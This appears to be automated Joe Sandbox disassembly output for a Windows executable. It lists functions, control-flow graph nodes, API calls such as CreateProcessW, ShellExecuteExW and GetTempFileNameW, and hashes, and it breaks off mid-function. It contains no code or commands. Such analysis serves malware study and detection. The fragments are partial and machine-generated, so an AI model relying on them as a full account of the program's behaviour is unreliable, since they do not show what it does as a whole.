                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 409a1f-409a88 memset 1 409a9a-409a9b 0->1 2 409a8a-409a98 0->2 3 409aa3-409aac 1->3 2->3 4 409ad5-409ad8 3->4 5 409aae-409ab7 3->5 7 409b20-409b29 4->7 8 409ada-409add 4->8 5->4 6 409ab9-409abe 5->6 6->4 12 409ac0-409ad3 6->12 10 409bbb-409bc3 7->10 11 409b2f-409b32 7->11 8->7 9 409adf-409af5 CreatePipe 8->9 9->7 13 409af7-409b15 call 4099c7 9->13 14 409bc5-409bd2 10->14 15 409c07-409c15 10->15 16 409b34-409b4a CreatePipe 11->16 17 409b75-409b78 11->17 18 409b1d 12->18 13->18 20 409bd4-409bd8 GetStdHandle 14->20 21 409bdf-409be6 14->21 22 409c17 15->22 23 409c19-409c20 15->23 16->17 24 409b4c-409b6d call 4099c7 16->24 17->10 25 409b7a-409b90 CreatePipe 17->25 18->7 20->21 27 409bf3-409bfa 21->27 28 409be8-409bec GetStdHandle 21->28 22->23 30 409c22 23->30 31 409c29-409c62 wcslen * 2 HeapAlloc 23->31 24->17 25->10 32 409b92-409bb3 call 4099c7 25->32 27->15 33 409bfc-409c00 GetStdHandle 27->33 28->27 30->31 35 409c64-409c84 wcscpy wcscat * 2 31->35 36 409c86-409c8e wcscpy 31->36 32->10 33->15 38 409c8f-409c9b 35->38 36->38 40 409cba-409cc3 38->40 41 409c9d-409cb8 wcscat * 2 38->41 42 409cd5-409cf2 CreateProcessW 40->42 43 409cc5-409cce 40->43 41->40 44 409cf8-409d02 42->44 45 409d9e-409da8 42->45 43->42 48 409d04-409d08 CloseHandle 44->48 49 409d0a-409d0e 44->49 46 409db0-409db4 45->46 47 409daa-409dae CloseHandle 45->47 50 409db6-409dba CloseHandle 46->50 51 409dbc-409dc0 46->51 47->46 48->49 52 409d10-409d14 CloseHandle 49->52 53 409d16-409d1a 49->53 50->51 54 409dc2-409dc6 CloseHandle 51->54 55 409dc8-409dcc 51->55 52->53 56 409d22-409d32 CloseHandle 53->56 57 409d1c-409d20 CloseHandle 53->57 54->55 58 409dd4-409dd8 55->58 59 409dce-409dd2 CloseHandle 55->59 60 409d40-409d44 56->60 61 409d34-409d3a WaitForSingleObject 56->61 57->56 62 409de0-409de4 58->62 63 409dda-409dde CloseHandle 58->63 59->58 64 409d93-409d99 CloseHandle 60->64 65 409d46-409d8e EnterCriticalSection call 40e1f2 LeaveCriticalSection 60->65 61->60 67 409de6-409dea CloseHandle 62->67 68 409dec-409df4 62->68 63->62 66 409f27-409f29 64->66 70 409f2a 65->70 66->70 67->68 68->70 71 409dfa-409e01 68->71 73 409f2c-409f49 HeapFree 70->73 74 409e03-409e12 wcslen 71->74 75 409e47-409ebb memset ShellExecuteExW 71->75 74->75 77 409e14-409e18 74->77 75->70 76 409ebd-409ec7 75->76 80 409ed8-409edc 76->80 81 409ec9-409ed2 WaitForSingleObject 76->81 78 409e21-409e23 77->78 79 409e1a-409e1f 77->79 78->75 82 409e25-409e42 wcscpy 78->82 79->77 79->78 83 409f1e-409f25 CloseHandle 80->83 84 409ede-409f1c EnterCriticalSection call 40e1f2 LeaveCriticalSection 80->84 81->80 82->75 83->66 84->73
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00409A69
                                                                        • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409AF1
                                                                        • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B46
                                                                        • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B8C
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00409BD6
                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00409BEA
                                                                        • GetStdHandle.KERNEL32(000000F4), ref: 00409BFE
                                                                        • wcslen.MSVCRT ref: 00409C2A
                                                                        • wcslen.MSVCRT ref: 00409C38
                                                                        • HeapAlloc.KERNEL32(00000000,00000000), ref: 00409C52
                                                                        • wcscpy.MSVCRT ref: 00409C6A
                                                                        • wcscat.MSVCRT ref: 00409C71
                                                                        • wcscat.MSVCRT ref: 00409C7C
                                                                        • wcscpy.MSVCRT ref: 00409C88
                                                                        • wcscat.MSVCRT ref: 00409CA3
                                                                        • wcscat.MSVCRT ref: 00409CB0
                                                                        • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,?,?,?), ref: 00409CEA
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D08
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D14
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D20
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D26
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00409D3A
                                                                        • EnterCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D4C
                                                                        • LeaveCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D63
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D97
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DAE
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DBA
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DC6
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DD2
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DDE
                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DEA
                                                                        • wcslen.MSVCRT ref: 00409E04
                                                                        • wcscpy.MSVCRT ref: 00409E2A
                                                                        • memset.MSVCRT ref: 00409E56
                                                                        • ShellExecuteExW.SHELL32 ref: 00409EB3
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00409ED2
                                                                        • EnterCriticalSection.KERNEL32(00418730), ref: 00409EE4
                                                                        • LeaveCriticalSection.KERNEL32(00418730), ref: 00409EFB
                                                                          • Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
                                                                          • Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
                                                                          • Part of subcall function 004099C7: DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
                                                                          • Part of subcall function 004099C7: CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00409F37
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$Close$CreateCriticalSectionwcscat$PipeProcesswcscpywcslen$CurrentEnterHeapLeaveObjectSingleWaitmemset$AllocDuplicateExecuteFreeShell
                                                                        • String ID: $0A$x
                                                                        • API String ID: 550696126-3693508903
                                                                        • Opcode ID: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
                                                                        • Instruction ID: 1938edec6f8ec7f018cd84e447521b205a2f1ffc1a01eed9409a43f0bd8935e3
                                                                        • Opcode Fuzzy Hash: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
                                                                        • Instruction Fuzzy Hash: 8AE15B71908341AFD321DF24D841B9BBBE4FF84350F148A3FF499A2291DB799944CB9A
                                                                        Function 00401000 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 108memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040100F
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                                                          • Part of subcall function 0040E4D0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
                                                                          • Part of subcall function 0040E4D0: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7
                                                                          • Part of subcall function 0040A1C0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9
                                                                          • Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(00418730,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691
                                                                          • Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
                                                                          • Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                                                                          • Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D
                                                                          • Part of subcall function 004053B5: InitializeCriticalSection.KERNEL32(00418708,0040107B,00000000,00001000,00000000,00000000), ref: 004053BA
                                                                        • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                                                                          • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
                                                                          • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
                                                                          • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502
                                                                          • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040AA98
                                                                          • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AAB1
                                                                          • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AABB
                                                                          • Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9DB
                                                                          • Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9F0
                                                                          • Part of subcall function 0040E266: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
                                                                          • Part of subcall function 0040E266: memset.MSVCRT ref: 0040E2D1
                                                                        • SetConsoleCtrlHandler.KERNEL32(00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064,00000008,00000008), ref: 0040116F
                                                                          • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                                                                          • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                                                                          • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                                                                          • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                                                                          • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(007C0000,00000000,?), ref: 0040E599
                                                                          • Part of subcall function 00401BA0: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,pF|,00000000), ref: 00401BDE
                                                                          • Part of subcall function 00401BA0: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
                                                                          • Part of subcall function 00401BA0: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,pF|), ref: 00401C03
                                                                        • ExitProcess.KERNEL32(00000000,pF|,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011B6
                                                                        • HeapDestroy.KERNEL32(00000000,pF|,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011C6
                                                                        • ExitProcess.KERNEL32(00000000,pF|,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011CB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorExitHandleLastLibraryProcessSectionValue$CommonConsoleControlsCtrlDestroyEnumHandlerInitLoadModuleResourceTypes
                                                                        • String ID: .pA$:pA$pF|$|pA
                                                                        • API String ID: 1974305647-4268443185
                                                                        • Opcode ID: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
                                                                        • Instruction ID: c3718d3f77f1aa7f822ccfb4f0aafd009571b65037601bc21910cdbb085b96b1
                                                                        • Opcode Fuzzy Hash: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
                                                                        • Instruction Fuzzy Hash: 77313271680704A9E200B7B39C47F9E3A18AB1874CF11883FB744790E3DEBC55584A6F
                                                                        Function 0040196C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                                                                        • GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404519), ref: 00401A3B
                                                                        • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A90
                                                                        • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AE5
                                                                        • PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AF0
                                                                        • PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B2F
                                                                        • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B49
                                                                          • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                                                                          • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                                                                          • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                                                                          • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                                                                          • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(007C0000,00000000,?), ref: 0040E599
                                                                          • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                                                                          • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(007C0000,00000000,?,?), ref: 0040E5BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                                                                        • String ID: $pA$$pA$$pA$$pA
                                                                        • API String ID: 368575804-1531182785
                                                                        • Opcode ID: 417cfe909ad584d3d84b117594ea6d6ab06f79ec2e3b7b64df38e28ad1b69bb8
                                                                        • Instruction ID: 7226354e244135f3a7293121bd0c5faf706f4cf1cd60fca57ba481f11b9cb304
                                                                        • Opcode Fuzzy Hash: 417cfe909ad584d3d84b117594ea6d6ab06f79ec2e3b7b64df38e28ad1b69bb8
                                                                        • Instruction Fuzzy Hash: 3D510F71104304BED600BBB2DC42E7F7A6DEB84308F018C3FB540A50E2EA3D99655A6E
                                                                        Function 0040B140 Relevance: 9.2, APIs: 6, Instructions: 157filememoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 241 40b140-40b156 242 40b160-40b173 call 40db18 241->242 243 40b158 241->243 246 40b322-40b32b 242->246 247 40b179-40b180 242->247 243->242 248 40b182-40b18a 247->248 249 40b1be-40b1c1 247->249 250 40b191-40b197 248->250 251 40b18c 248->251 252 40b1c3-40b1cb 249->252 253 40b1fc-40b1ff 249->253 254 40b199 250->254 255 40b19c-40b1b9 CreateFileW 250->255 251->250 256 40b1d2-40b1d8 252->256 257 40b1cd 252->257 258 40b201-40b20d 253->258 259 40b268 253->259 254->255 260 40b26c-40b26f 255->260 261 40b1da 256->261 262 40b1dd-40b1fa CreateFileW 256->262 257->256 263 40b218-40b21e 258->263 264 40b20f-40b214 258->264 259->260 267 40b275-40b277 260->267 268 40b30b 260->268 261->262 262->260 265 40b220-40b223 263->265 266 40b227-40b247 CreateFileW 263->266 264->263 265->266 266->267 269 40b249-40b266 CreateFileW 266->269 267->268 271 40b27d-40b284 267->271 270 40b30f-40b312 268->270 269->260 272 40b314 270->272 273 40b316-40b31d call 40da8a 270->273 274 40b2a2 271->274 275 40b286-40b28c 271->275 272->273 273->246 278 40b2a5-40b2d2 274->278 275->274 277 40b28e-40b2a0 HeapAlloc 275->277 277->278 279 40b2f0-40b2f9 278->279 280 40b2d4-40b2da 278->280 282 40b2fb 279->282 283 40b2fd-40b2ff 279->283 280->279 281 40b2dc-40b2ea SetFilePointer 280->281 281->279 282->283 283->270 284 40b301-40b30a 283->284
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1B1
                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1F2
                                                                        • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B23C
                                                                        • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040B25E
                                                                        • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040B297
                                                                        • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040B2EA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: File$Create$AllocHeapPointer
                                                                        • String ID:
                                                                        • API String ID: 4207849991-0
                                                                        • Opcode ID: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
                                                                        • Instruction ID: 8d8b4ccba24edc48a090e0818cc57ca2d498b7de68d829e88f81714118269cc7
                                                                        • Opcode Fuzzy Hash: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
                                                                        • Instruction Fuzzy Hash: D251B171244301ABE3208E15DC49B6BBAE5EB44764F24493EFD81A63E0D779E8458B8D
                                                                        Function 0040DE99 Relevance: 7.6, APIs: 5, Instructions: 106memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 285 40de99-40deb8 286 40deba-40debc 285->286 287 40debe-40dec0 285->287 286->287 288 40df72-40df85 RtlAllocateHeap 287->288 289 40dec6-40dee9 call 40e0c3 EnterCriticalSection 287->289 291 40df87-40dfa5 288->291 292 40dfbd-40dfc3 288->292 296 40def7-40def9 289->296 294 40dfb0-40dfb7 InitializeCriticalSection 291->294 295 40dfa7-40dfa9 291->295 294->292 295->294 297 40dfab-40dfae 295->297 298 40deeb-40deee 296->298 299 40defb 296->299 297->292 300 40def0-40def3 298->300 301 40def5 298->301 302 40df07-40df1b HeapAlloc 299->302 300->301 305 40defd-40df05 300->305 301->296 303 40df65-40df70 LeaveCriticalSection 302->303 304 40df1d-40df38 call 40de99 302->304 303->292 304->303 308 40df3a-40df5a 304->308 305->302 305->303 309 40df5c 308->309 310 40df5f 308->310 309->310 310->303
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(00418684,0041867C,0040E062,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DEDA
                                                                        • HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040DF11
                                                                        • LeaveCriticalSection.KERNEL32(00418684,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DF6A
                                                                        • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DF7B
                                                                        • InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DFB7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2054306384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2054290766.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054324926.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054338488.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2054348855.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_da6ke5KbfB.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
                                                                        • String ID:
                                                                        • API String ID: 1272335518-0
                                                                        • Opcode ID: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
                                                                        • Instruction ID: e12e1174ac54fca87ec7e67201d5359a366fc17122bfc308660e030bf91fb77e
                                                                        • Opcode Fuzzy Hash: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
                                                                        • Instruction Fuzzy Hash: 90318D71940B069BC3208F95D844A52FBF0FB44720B19C93EE446A77A0DB78E908CB99
                                                                        Function 00403F53 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 571COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 311 403f53-403f54 312 403f59-403f64 311->312 312->312 313 403f66-403f7c call 40e660 312->313 316 403f7e-403f86 313->316 317 403f88-403fea call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 316->317 318 403fec-403ffd 316->318 317->316 317->318 320 403fff-404007 318->320 322 404009-40406b call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 320->322 323 40406d-40407e 320->323 322->320 322->323 326 404080-404088 323->326 329 40408a-4040ec call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 326->329 330 4040ee-4040ff 326->330 329->326 329->330 331 404101-404109 330->331 336 40410b-40416d call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 331->336 337 40416f-404180 331->337 336->331 336->337 343 404182-40418a 337->343 349 4041f0-404201 343->349 350 40418c-4041e6 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 343->350 356 404203-40420b 349->356 469 4041eb-4041ee 350->469 362 404275-404286 356->362 363 40420d-404273 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 356->363 370 404288-404290 362->370 363->356 363->362 377 404292-4042f8 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 370->377 378 4042fa-40430b 370->378 377->370 377->378 386 40430d-404315 378->386 394 404317-404375 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 386->394 395 40437f-404390 386->395 496 40437a-40437d 394->496 404 404392-40439a 395->404 405 404404-4045ee call 40e520 call 40e6c0 * 2 call 40e560 call 40e520 call 403221 call 40e560 call 40985e GetModuleHandleW call 40e520 * 4 call 40d780 call 405182 call 405eb0 call 40e560 call 40e520 * 4 call 40d780 call 405182 call 405eb0 call 40e560 call 402e49 call 40e520 call 402150 call 4051a0 call 40196c call 40469c call 40e520 call 405100 call 403539 call 40e560 PathRemoveBackslashW call 402068 call 40e520 * 2 call 402ba6 call 40e720 call 405182 call 4099a5 call 4051a0 call 40e520 call 40e6c0 * 2 call 40e560 call 403801 call 40e520 call 401e66 call 40e560 404->405 406 40439c-404402 call 40e520 * 2 call 405dc0 call 40e560 call 40e520 call 40e6c0 * 2 call 40e560 404->406 587 4045f0-404606 call 40548c 405->587 588 404608-40460c call 402c55 405->588 406->404 406->405 469->343 469->349 496->386 496->395 592 404611-40469b call 403c83 SetConsoleCtrlHandler call 401fba call 40e5f0 * 9 587->592 588->592
                                                                        APIs
                                                                          • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                                                                          • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(007C0000,00000000,?), ref: 0040E599
                                                                          • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                                                                          • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                                                                          • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                                                                          • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
